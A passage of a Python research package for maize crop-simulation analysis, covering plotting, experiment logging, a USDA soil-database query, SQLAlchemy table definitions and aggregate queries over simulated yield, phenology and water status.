ax.annotate(pheno, (12, 3.2), fontweight='light', size=10)
def plot_mean_disp_change(run_name_present, run_name_future, phenos):
"""
Plot yield mean and yield dispersion change.
Parameters
----------
run_name_present : str
run_name_future : str
phenos : list
"""
yield_mean_norm_present, yield_disp_norm_present = fetch_norm_mean_disp(
run_name_present)
yield_mean_norm_future, yield_disp_norm_future = fetch_norm_mean_disp(
run_name_future)
diffs_yield, diffs_disp = fetch_mean_disp_diff(
run_name_present, run_name_future, phenos)
fig = plt.figure(figsize=(10, 5))
ax = fig.add_subplot()
ax.scatter(yield_mean_norm_present, yield_disp_norm_present,
c='slategrey', s=100, alpha=0.2)
ax.scatter(yield_mean_norm_present[phenos],
yield_disp_norm_present[phenos],
c='tab:purple', s=100, alpha=0.4)
for item, pheno in enumerate(phenos):
plt.arrow(yield_mean_norm_present[pheno],
yield_disp_norm_present[pheno],
diffs_yield[item], diffs_disp[item],
color='grey', alpha=0.5,
head_width=0.01)
for pheno in phenos:
ax.annotate(pheno, (yield_mean_norm_present[pheno],
yield_disp_norm_present[pheno]), c='grey')
ax.set_ylim(-0.1, 1.1)
ax.set_xlim(-0.1, 1.1)
ax.set_xlabel('yield mean', fontweight='light', size=14)
ax.set_ylabel('dispersion index', fontweight='light', size=14)
ax.set_title('Yield mean and disparsion - averaged over all sites',
fontweight='light', size=15)
def plot_sims_yield(run_name, pheno):
"""
Plot detailed sim plots for yield.
Parameters
----------
run_name : str
pheno : int
"""
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
os.path.join(DATA_PATH, 'files', f'filepaths_{run_name}.yml'))
cols = ['date', 'jday', 'time',
'leaves', 'mature_lvs', 'drop_lvs', 'LA', 'LA_dead', 'LAI',
'RH', 'leaf_WP', 'PFD', 'Solrad',
'temp_soil', 'temp_air', 'temp_can',
'ET_dmd', 'ET_suply', 'Pn', 'Pg', 'resp', 'av_gs',
'LAI_sunlit', 'LAI_shaded',
'PFD_sunlit', 'PFD_shaded',
'An_sunlit', 'An_shaded',
'Ag_sunlit', 'Ag_shaded',
'gs_sunlit', 'gs_shaded',
'VPD', 'N', 'N_dmd', 'N_upt', 'N_leaf', 'PCRL',
'dm_total', 'dm_shoot', 'dm_ear', 'dm_totleaf',
'dm_dropleaf', 'dm_stem', 'dm_root',
'soil_rt', 'mx_rootdept',
'available_water', 'soluble_c', 'note']
fig = plt.figure(figsize=(20, 50))
sites = df_sites.site
for loc in np.arange(60):
ax = fig.add_subplot(12, 5, loc+1)
ax.set_ylim(0, 350)
ax.set_xlim(0, 5000)
ax.annotate(f'{loc}: {sites[loc]} - {df_sites.iloc[loc]["state"]}',
(200, 320))
site = sites[loc]
years = df_sims.query(f'cvar=={pheno}').query(f'site=="{site}"').year
for year in years:
df = pd.read_csv(
f'/home/disk/eos8/ach315/upscale/sims/'
f'{run_name}/{year}/var_{pheno}/'
f'out1_{site}_{year}_var_{pheno}.txt')
df.columns = cols
ax.plot(df.dm_ear, alpha=0.5)
ax.annotate(year, (len(df), list(df.dm_ear)[-1]), color='grey')
def plot_sims_phenostage(run_name, pheno, df_sims, df_sites, df_phenology):
"""
Plot phenostage sims for all years for specified pheno.
Parameters
----------
run_name : str
pheno : int
df_sims : pd.DataFrame
Output from `read_data` function.
df_sites : pd.DataFrame
Output from `read_data` function.
df_phenology : pd.DataFrame
csv data queried from sim database.
"""
fig = plt.figure(figsize=(20, 50))
sites = df_sites.site
phenostages = ['"Germinated"', '"Emerged"', '"Tasselinit"',
'"Tasseled"', '"Silked"', '"grainFill"', '"Matured"']
colors = ['#66a61e', '#1b9e77',
Mendl_4.mpl_colors[0],
Mendl_4.mpl_colors[1],
Mendl_4.mpl_colors[3],
Mendl_4.mpl_colors[2]]
for item, site in enumerate(sites):
ax = fig.add_subplot(12, 5, item+1)
ax.set_title(f'{item}: {site} - {df_sites.iloc[item]["state"]}',
fontweight='light')
ax.set_xlim(50, 360)
ax.set_ylim(1959, 2007)
jday_months = [32, 61, 91, 121, 152, 182, 213, 244, 274, 305, 335]
ax.set_xticks(jday_months)
ax.set_xticklabels([2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],
fontweight='light', fontsize=12)
years = df_sims.query(f'cvar=={pheno}').query(f'site=="{site}"').year
for year in years[:]:
df_phenology_sub = df_phenology.query(
f'cvar=={pheno}').query(f'site=={site}').query(f'year=={year}')
jdays = []
for phenostage in phenostages:
try:
jday = df_phenology_sub[
df_phenology_sub['pheno'] == phenostage].jday.item()
jdays.append(jday)
except(ValueError):
jdays.append(np.nan)
if jdays[-1] is np.nan:
# check if pheno reached grain-fill
# but did not make it to maturity
df = pd.read_csv(
f'/home/disk/eos8/ach315/upscale/sims/'
f'{run_name}/{year}/var_{pheno}/'
f'out1_{site}_{year}_var_{pheno}.txt')
df.iloc[-1]['date']
date = datetime.strptime(df.iloc[-1]['date'], '%m/%d/%Y')
jday = int(date.strftime('%j'))
if jday >= 333:
# jday 333 = Nov. 29th
# set last day of grain-fill to Nov. 29th
jdays[-1] = 333
for loc, color in zip(np.arange(len(phenostages)), colors):
ax.plot([jdays[loc], jdays[loc+1]], [year, year], color=color)
fig.subplots_adjust(hspace=0.25)
```
#### File: ideotype/ideotype/log.py
```python
import os
import yaml
from ideotype.data import DATA_PATH
def log_fetchinfo(run_name):
"""
Fetch info needed for experiment log file.
Parameters
----------
run_name: str
Run name for batch of maizsim simulations.
Must match an existing experiment run name.
Notes
_____
- init_runame.yml info stored in /ideotype/ideotype/data/inits/
- Each run experiment should have unique init_runame.yml file.
"""
# setup file name for init_.yml with relative path in data folder
fpath_init = os.path.join(DATA_PATH, 'inits', 'init_' + run_name + '.yml')
# check whether specified init_.yml file exist
if not os.path.isfile(fpath_init):
raise ValueError(f'init param file {fpath_init} does not exist!')
# setup log file
log_runinfo = os.path.join(DATA_PATH, 'logs',
'log_' + run_name + '.yml')
# check if log file for experiment exists already
if os.path.isfile(log_runinfo):
raise ValueError(
f'log file for run_name: "{run_name}" exists already!')
# read in init param yaml file
with open(fpath_init, 'r') as pfile:
dict_init = yaml.safe_load(pfile)
# check that run name listed in yaml file matches
# what was passed to log_fetchinfo
if dict_init['setup']['run_name'] != run_name:
raise ValueError('mismatched yaml run name!')
# setup dict to hold all log info
dict_log = {}
# fetch all setup info from yaml file and add to log
for key, value in dict_init['setup'].items():
dict_log[key] = value
dict_log['params'] = dict_init['params']
dict_log['specs'] = dict_init['specs']
# add yaml file name to log
dict_log['pdate'] = dict_init['init']['plant_date']
dict_log['init_yml'] = 'init_' + run_name + '.yml'
# import package version and add to log
from ideotype import __version__
dict_log['ideotype_version'] = __version__
# writing out log as yaml file
with open(log_runinfo, 'w') as outfile:
yaml.dump(dict_log, outfile, default_flow_style=False)
```
#### File: ideotype/ideotype/soils_query.py
```python
import requests
import xmltodict
import pandas as pd
def soilquery(latitude, longitude):
"""
Query for NRCS SSURGO soil database (code modified from Maura, USDA ARS).
Info on SSURGO database:
https://www.nrcs.usda.gov/wps/portal/nrcs/detail/soils/survey/geo/?cid=nrcs142p2_053631
- awc_r:
The amount of water that an increment of soil depth,
inclusive of fragments, can store that is available to plants.
AWC is expressed as a volume fraction,
and is commonly estimated as the difference between
the water contents at 1/10 or 1/3 bar (field capacity)
and 15 bars (permanent wilting point) tension
and adjusted for salinity, and fragments.
- dbthirdbar_r:
The oven dry weight of the less than 2 mm soil material
per unit volume of soil at a water tension of 1/3 bar.
- wthirdbar_r:
The volumetric content of soil water retained
at a tension of 1/3 bar (33 kPa, field capacity, saturation),
expressed as a percentage of the whole soil (need to divide by 100).
- wfifteenbar_r:
The volumetric content of soil water retained at
a tension of 15 bars (1500 kPa, wilting point),
expressed as a percentage of the whole soil.
"""
lat = str(latitude)
lon = str(longitude)
lonLat = lon + " " + lat
url = "https://SDMDataAccess.nrcs.usda.gov/Tabular/SDMTabularService.asmx"
# headers = {'content-type': 'application/soap+xml'}
headers = {'content-type': 'text/xml'}
body = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
xmlns:sdm="http://SDMDataAccess.nrcs.usda.gov/Tabular/SDMTabularService.asmx">
<soap:Header/>
<soap:Body>
<sdm:RunQuery>
<sdm:Query>SELECT
co.cokey as cokey,
ch.chkey as chkey,
comppct_r as prcent,
slope_r,
slope_h as slope,
hzname,
hzdept_r as depth,
awc_r as awc,
claytotal_r as clay,
silttotal_r as silt,
sandtotal_r as sand,
om_r as OM,
dbthirdbar_r as dbthirdbar,
wthirdbar_r as th33,
wfifteenbar_r as th1500,
(dbthirdbar_r-wthirdbar_r)/100 as bd
FROM sacatalog sc
FULL OUTER JOIN legend lg
ON sc.areasymbol=lg.areasymbol
FULL OUTER JOIN mapunit mu ON lg.lkey=mu.lkey
FULL OUTER JOIN component co ON mu.mukey=co.mukey
FULL OUTER JOIN chorizon ch ON co.cokey=ch.cokey
FULL OUTER JOIN chtexturegrp ctg ON ch.chkey=ctg.chkey
FULL OUTER JOIN chtexture ct ON ctg.chtgkey=ct.chtgkey
FULL OUTER JOIN copmgrp pmg ON co.cokey=pmg.cokey
FULL OUTER JOIN corestrictions rt ON co.cokey=rt.cokey
WHERE mu.mukey IN (
SELECT *
from SDA_Get_Mukey_from_intersection_with_WktWgs84('point(""" + lonLat + """)'))
order by co.cokey, ch.chkey, prcent, depth
</sdm:Query>
</sdm:RunQuery>
</soap:Body>
</soap:Envelope>"""
response = requests.post(url, data=body, headers=headers)
# Put query results in dictionary format
my_dict = xmltodict.parse(response.content)
# Convert from dictionary to dataframe format
df_soil = pd.DataFrame.from_dict(
my_dict['soap:Envelope']['soap:Body'][
'RunQueryResponse']['RunQueryResult'][
'diffgr:diffgram']['NewDataSet']['Table'])
# Drop columns where all values are None or NaN
df_soil = df_soil.dropna(axis=1, how='all')
df_soil = df_soil[df_soil.chkey.notnull()]
# Drop unecessary columns
df_soil = df_soil.drop(['@diffgr:id',
'@msdata:rowOrder',
'@diffgr:hasChanges'], axis=1)
# Drop duplicate rows
df_soil = df_soil.drop_duplicates()
# Convert prcent and depth column from object to float
df_soil['prcent'] = df_soil['prcent'].astype(float)
df_soil['depth'] = df_soil['depth'].astype(float)
df_soil['clay'] = df_soil['clay'].astype(float)
df_soil['silt'] = df_soil['silt'].astype(float)
df_soil['sand'] = df_soil['sand'].astype(float)
df_soil['OM'] = df_soil['OM'].astype(float)
df_soil['th33'] = df_soil['th33'].astype(float)
df_soil['bd'] = df_soil['bd'].astype(float)
# Select rows with max prcent
df_soil = df_soil[df_soil.prcent == df_soil.prcent.max()]
# Sort rows by depth
df_soil = df_soil.sort_values(by=['depth'])
return df_soil
```
#### File: ideotype/ideotype/sql_altertable.py
```python
from sqlalchemy import create_engine
def alter_table(fpath_db):
"""Reorder sims DB order to take advantage of auto-index."""
engine = create_engine('sqlite:///' + fpath_db)
with engine.connect() as con:
con.execute('PRAGMA foreign_keys=off')
con.execute('BEGIN TRANSACTION')
con.execute(
'CREATE TABLE IF NOT EXISTS new_sims(\
year int not null,\
cvar int not null,\
site varchar(6) not null,\
run_name varchar(20) not null,\
jday int not null,\
time int not null,\
date varchar(10),\
leaves float,\
leaves_mature float,\
leaves_dropped float,\
LA_perplant float,\
LA_dead float,\
LAI float,\
leaf_wp float,\
temp_soil float,\
temp_air float,\
temp_canopy float,\
ET_dmd float,\
ET_sply float,\
Pn float,\
Pg float,\
resp float,\
av_gs float,\
LAI_sun float,\
LAI_shade float,\
PFD_sun float,\
PFD_shade float,\
An_sun float,\
An_shade float,\
Ag_sun float,\
Ag_shade float,\
gs_sun float,\
gs_shade float,\
VPD float,\
Nitr float,\
N_Dem float,\
NUpt float,\
LeafN float,\
PCRL float,\
DM_total float,\
DM_shoot float,\
DM_ear float,\
DM_leaf float,\
DM_stem float,\
DM_root float,\
AvailW float,\
solubleC float,\
pheno varchar(20),\
PRIMARY KEY (year, cvar, site, run_name, jday, time),\
FOREIGN KEY (cvar) REFERENCES params (cvar),\
FOREIGN KEY (site) REFERENCES site_info (site))')
con.execute(
'INSERT INTO new_sims('
'year,'
'cvar,'
'site,'
'run_name,'
'jday,'
'time,'
'date,'
'leaves,'
'leaves_mature,'
'leaves_dropped,'
'LA_perplant,'
'LA_dead,'
'LAI,'
'leaf_wp,'
'temp_soil,'
'temp_air,'
'temp_canopy,'
'ET_dmd,'
'ET_sply,'
'Pn,'
'Pg,'
'resp,'
'av_gs,'
'LAI_sun,'
'LAI_shade,'
'PFD_sun,'
'PFD_shade,'
'An_sun,'
'An_shade,'
'Ag_sun,'
'Ag_shade,'
'gs_sun,'
'gs_shade,'
'VPD,'
'Nitr,'
'N_Dem,'
'NUpt,'
'LeafN,'
'PCRL,'
'DM_total,'
'DM_shoot,'
'DM_ear,'
'DM_leaf,'
'DM_stem,'
'DM_root,'
'AvailW,'
'solubleC,'
'pheno) '
'SELECT '
'year,'
'cvar,'
'site,'
'run_name,'
'jday,'
'time,'
'date,'
'leaves,'
'leaves_mature,'
'leaves_dropped,'
'LA_perplant,'
'LA_dead,'
'LAI,'
'leaf_wp,'
'temp_soil,'
'temp_air,'
'temp_canopy,'
'ET_dmd,'
'ET_sply,'
'Pn,'
'Pg,'
'resp,'
'av_gs,'
'LAI_sun,'
'LAI_shade,'
'PFD_sun,'
'PFD_shade,'
'An_sun,'
'An_shade,'
'Ag_sun,'
'Ag_shade,'
'gs_sun,'
'gs_shade,'
'VPD,'
'Nitr,'
'N_Dem,'
'NUpt,'
'LeafN,'
'PCRL,'
'DM_total,'
'DM_shoot,'
'DM_ear,'
'DM_leaf,'
'DM_stem,'
'DM_root,'
'AvailW,'
'solubleC,'
'pheno '
'FROM sims')
con.execute('DROP TABLE sims')
con.execute('ALTER TABLE new_sims RENAME TO sims')
con.execute('CREATE INDEX id_runame ON sims(run_name)')
con.execute('CREATE INDEX id_year ON sims(year')
con.execute('CREATE INDEX id_cvar ON sims(cvar)')
con.execute('CREATE INDEX id_site ON sims(site)')
con.execute('CREATE INDEX id_siteyear ON sims(year, site)')
con.execute('CREATE INDEX id_pheno ON sims(pheno)')
```
#### File: ideotype/ideotype/sql_declarative.py
```python
from sqlalchemy import (Column, ForeignKey, ForeignKeyConstraint,
Integer, String, Float)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
class IdeotypeBase(object):
"""
Add specifics to Base to debug.
__repr__:
"""
def __repr__(self): # magic function __repr__
"""Define standard representation."""
columns = self.__table__.columns.keys()
rep_str = '<' + self.__class__.__name__ + '('
for c in columns:
rep_str += str(getattr(self, c)) + ', ' # getattr
rep_str = rep_str[0:-2]
rep_str += ')>'
return rep_str
# declarative_base is how you define tables
# makes an instance of a declarative_base() object
IdeotypeBase = declarative_base(cls=IdeotypeBase)
class WeaData(IdeotypeBase):
"""
DB table for weather data table.
Parameters
----------
site: String Column
Simulation site.
"""
__tablename__ = 'weadata'
year = Column(Integer, primary_key=True)
site = Column(String(6),
ForeignKey('site_info.site'),
primary_key=True)
jday = Column(Integer, primary_key=True)
time = Column(Integer, primary_key=True)
date = Column(String)
solar = Column(Float)
temp = Column(Float)
precip = Column(Float)
rh = Column(Float)
co2 = Column(Integer)
vpd = Column(Float)
class Sims(IdeotypeBase):
"""
DB table for simulation outputs.
Attributes
----------
run_name: String Column
Run name for bath of simulation experiments. Part of primary_key.
cvar: Integer Column
Cultivar number that represents specific param combinations.
site: String Column
Simulation site id.
year: Integer Column
Simualtion year.
cvar: String Column
Simulation cultivar choice.
date: DateTime Column
MAIZSIM simulation output timestep date.
time: Integer Column
MAIZSIM simulation output timestep hour.
"""
__tablename__ = 'sims'
# primary keys
cvar = Column(Integer,
ForeignKey('params.cvar'),
primary_key=True)
year = Column(Integer, primary_key=True)
site = Column(String(6),
ForeignKey('site_info.site'),
primary_key=True)
run_name = Column(String(20),
ForeignKey('params.run_name'),
primary_key=True)
jday = Column(Integer, primary_key=True)
time = Column(Integer, primary_key=True)
__table_args__ = (ForeignKeyConstraint(
['run_name', 'cvar'], ['params.run_name', 'params.cvar']), {})
# other columns
date = Column(String)
leaves = Column(Float)
leaves_mature = Column(Float)
leaves_dropped = Column(Float)
LA_perplant = Column(Float)
LA_dead = Column(Float)
LAI = Column(Float)
leaf_wp = Column(Float)
temp_soil = Column(Float)
temp_air = Column(Float)
temp_canopy = Column(Float)
ET_dmd = Column(Float)
ET_sply = Column(Float)
Pn = Column(Float)
Pg = Column(Float)
resp = Column(Float)
av_gs = Column(Float)
LAI_sun = Column(Float)
LAI_shade = Column(Float)
PFD_sun = Column(Float)
PFD_shade = Column(Float)
An_sun = Column(Float)
An_shade = Column(Float)
Ag_sun = Column(Float)
Ag_shade = Column(Float)
gs_sun = Column(Float)
gs_shade = Column(Float)
VPD = Column(Float)
Nitr = Column(Float)
N_Dem = Column(Float)
NUpt = Column(Float)
LeafN = Column(Float)
PCRL = Column(Float)
DM_total = Column(Float)
DM_shoot = Column(Float)
DM_ear = Column(Float)
DM_leaf = Column(Float)
DM_stem = Column(Float)
DM_root = Column(Float)
AvailW = Column(Float)
solubleC = Column(Float)
pheno = Column(String)
class Params(IdeotypeBase):
"""
DB table for sampled parameter combinations.
Attributes
----------
run_name: String Column
Run name of simulation experiments. Part of primary key.
cvar: Integer Column
Cultivar number that represents specific param combinations.
param: String Column
Perturbed parameter.
value: Float Column
Parameter value.
"""
__tablename__ = 'params'
run_name = Column(String(20), primary_key=True)
cvar = Column(Integer, primary_key=True)
param = Column(String, primary_key=True)
value = Column(Float)
class SiteInfo(IdeotypeBase):
"""
DB table for simulation site info.
Attributes
----------
site : String Column
Simulation site. Primary key.
state : String Column
lat : Float Column
lon : Float Column
years : Integer Column
Years of weather data available at simulation site.
area : Float Column
Area maize planted (#TODO: find unit).
Average value from nearby NASS sites (#TODO: find how many site).
perct_irri : Float Column
Percent irrigated for simulation site.
Average value from nearby NASS sites.
texture : String Column
Soil texture for simulated site.
"""
__tablename__ = 'site_info'
site = Column(String(6), primary_key=True)
state = Column(String(2))
lat = Column(Float)
lon = Column(Float)
years = Column(Integer)
area = Column(Float)
perct_irri = Column(Float)
texture = Column(String(6))
class LogInit(IdeotypeBase):
"""
DB table for log files.
Attributes
----------
run_name: String Column
Run name of simulation experiments.
Primary key.
Foreign key link to Sims and Params table.
init_yml: String Column
init yaml file used for experiment.
path_inits: String Column
Path where inits are stored for experiment.
path_params: String Column
Path where inits are stored for experiment.
path_jobs: String Column
Path where jobs are stored for experiment.
path_sims: String Column
Path where sims are stroed for experiment.
path_maizsim: String Column
Path pointing to maizsim directory used.
siteyears: String Column
Path pointing to siteyears efile used.
site_info: String Column
Path pointing to site_info file used.
site_summary: String Column
Path pointing to site_summary file used.
pdate: String Column
Planting date set for simualtions.
version: String Column
ideotype version - git hash.
"""
__tablename__ = 'log_init'
run_name = Column(String,
ForeignKey('params.run_name'),
primary_key=True)
init_yml = Column(String)
path_inits = Column(String)
path_params = Column(String)
path_jobs = Column(String)
path_sims = Column(String)
path_maizsim = Column(String)
siteyears = Column(String)
site_info = Column(String)
site_summary = Column(String)
pdate = Column(String)
version = Column(String)
def create_table(fpath_db):
"""
Create table in engine.
Parameters
----------
fpath_db: str
Path pointing to database.
"""
# create engine to setup database
engine = create_engine('sqlite:///' + fpath_db)
# create all tables in engine
# = 'Create Table' in SQL
# metadata contains all definition of tables
IdeotypeBase.metadata.create_all(engine)
return engine
```
#### File: ideotype/ideotype/sql_query.py
```python
import csv
import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy import func, and_
from sqlalchemy.sql.expression import distinct
from ideotype.sql_declarative import (IdeotypeBase,
WeaData,
Sims,
SiteInfo,
Params)
def query_weadata(fpath_db):
"""
Weathere data query.
- Average meteorology at each site.
- Variance of meteorology at each site.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(WeaData.site.label('site'),
func.avg(WeaData.temp).label('mean_temp'),
func.avg(WeaData.vpd).label('mean_vpd'),
func.sum(WeaData.precip).label('total_precip'),
func.count(WeaData.precip).label('precip_count')
).group_by(WeaData.site)
results = query.all()
# query output as csv
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
with open('testoutput.csv', 'w') as outfile:
outcsv = csv.writer(outfile)
outcsv.writerow(columns)
for row in results:
outcsv.writerow(row)
def query_gseason_climate(fpath_db, phenos):
"""
Query in-season climate.
Climate data queried from maizsim output,
which means there could be slight differences between
the climate conditions each phenotype experiences
due to difference in pdate & phenology.
Parameters
----------
fpath_db : str
phenos : list
List of top phenotype numbers.
Returns
-------
query : sqlalchemy query
results : list
List of query results.
df : pd.DataFrame
DataFrame of queried results.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.year.label('year'),
Sims.site.label('site'),
Sims.pheno.label('pheno'),
func.avg(Sims.temp_air).label('temp_air'),
func.avg(Sims.temp_canopy).label('temp_can'),
func.avg(Sims.temp_soil).label('temp_soil'),
func.avg(Sims.VPD).label('vpd'),
func.avg(Sims.PFD_sun).label('pfd_sun'),
func.avg(Sims.PFD_shade).label('pfd_shade'),
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_yield(fpath_db, phenos):
"""
Sims query.
- Final yield for each site-year-cvar combination.
- Yield variation across cvars.
- Yield variation across sites.
- Yield variation across years.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.year.label('year'),
Sims.site.label('site'),
Sims.pheno.label('pheno'),
func.avg(Sims.DM_ear).label('yield'),
SiteInfo.lat.label('lat'),
SiteInfo.lon.label('lon'),
SiteInfo.texture.label('soil_texture'),
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno,
SiteInfo.site).filter(
and_(Sims.pheno == '"Matured"',
Sims.cvar.in_(phenos),
Sims.site == SiteInfo.site,
Sims.cvar == Params.cvar
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_phys(fpath_db, phenos):
"""
Query phhysiological model outputs during sunlit hours.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.avg(Sims.av_gs).label('gs'),
func.avg(Sims.Pn).label('pn'),
func.avg(Sims.Pg).label('pg'),
func.max(Sims.LAI_sun).label('LAI_sun'),
func.max(Sims.LAI_shade).label('LAI_shade'),
func.avg(Sims.Ag_sun).label('Ag_sun'),
func.avg(Sims.Ag_shade).label('Ag_shade'),
func.avg(Sims.An_sun).label('An_sun'),
func.avg(Sims.An_shade).label('An_shade')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
Sims.PFD_sun > 0
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
# Scale photosynthesis to canopy
df['sun_perct'] = df.LAI_sun/(df.LAI_sun + df.LAI_shade)
df['shade_perct'] = df.LAI_shade/(df.LAI_sun + df.LAI_shade)
df['Ag'] = (df.Ag_sun * df.sun_perct) + (df.Ag_shade * df.shade_perct)
df['An'] = (df.An_sun * df.sun_perct) + (df.An_shade * df.shade_perct)
return(query, results, df)
def query_carbon(fpath_db, phenos):
"""
Query mean and total carbon accumulation across phenostage.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.sum(Sims.Pn).label('pn_sum'),
func.sum(Sims.Pg).label('pg_sum'),
func.avg(Sims.Pn).label('pn_mean'),
func.avg(Sims.Pg).label('pg_mean')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_mass(fpath_db, phenos):
"""
Query mass.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.max(Sims.DM_total).label('dm_total'),
func.max(Sims.DM_root).label('dm_root'),
func.max(Sims.DM_shoot).label('dm_shoot'),
func.max(Sims.DM_stem).label('dm_stem'),
func.max(Sims.DM_leaf).label('dm_leaf'),
func.max(Sims.DM_ear).label('dm_ear'),
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos)
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_pheno(fpath_db, phenos):
"""
Query pheno info.
Parameters
----------
fpath_db : str
phenos : list
List of top phenotype numbers.
Returns
-------
query : sqlalchemy query
results : list
List of query results.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.count(distinct(Sims.jday)).label('pheno_days'),
func.min(Sims.jday).label('jday_start'),
func.min(Sims.date).label('date_start')
).group_by(Sims.cvar,
Sims.site,
Sims.year,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos)
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_leaves(fpath_db, phenos):
"""
Query physiological model outputs.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.max(Sims.LAI).label('LAI'),
func.max(Sims.LA_perplant).label('LA'),
func.max(Sims.leaves).label('leaves'),
func.max(Sims.leaves_mature).label('leaves_mature'),
func.max(Sims.leaves_dropped).label('leaves_dropped')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos)
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_waterstatus(fpath_db, phenos):
"""
Query water status.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.avg(
Sims.ET_sply - Sims.ET_dmd).label(
'water_deficit_mean'),
func.sum(
Sims.ET_sply - Sims.ET_dmd).label(
'water_deficit_sum')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
Sims.time == 12,
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_waterstatus_sum(fpath_db, phenos):
"""
Query water status summed across phenostage.
Parameters
----------
fpath_db : str
phenos : list
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.sum(
Sims.ET_sply - Sims.ET_dmd).label(
'water_deficit_sum')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
df = pd.DataFrame(results, columns=columns)
return(query, results, df)
def query_waterpotential(fpath_db, phenos, time):
"""
Query water status.
Parameters
----------
fpath_db : str
phenos : list
time : int
Time to query.
"""
engine = create_engine('sqlite:///' + fpath_db)
IdeotypeBase.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
query = session.query(Sims.cvar.label('cvar'),
Sims.site.label('site'),
Sims.year.label('year'),
Sims.pheno.label('pheno'),
func.avg(Sims.leaf_wp).label('leaf_wp')
).group_by(Sims.cvar,
Sims.year,
Sims.site,
Sims.pheno).filter(
and_(Sims.cvar.in_(phenos),
Sims.time == time,
Sims.leaf_wp > -5
))
results = query.all()
# Construct dataframe from database query
columns = []
for item in query.column_descriptions:
columns.append(item['name'])
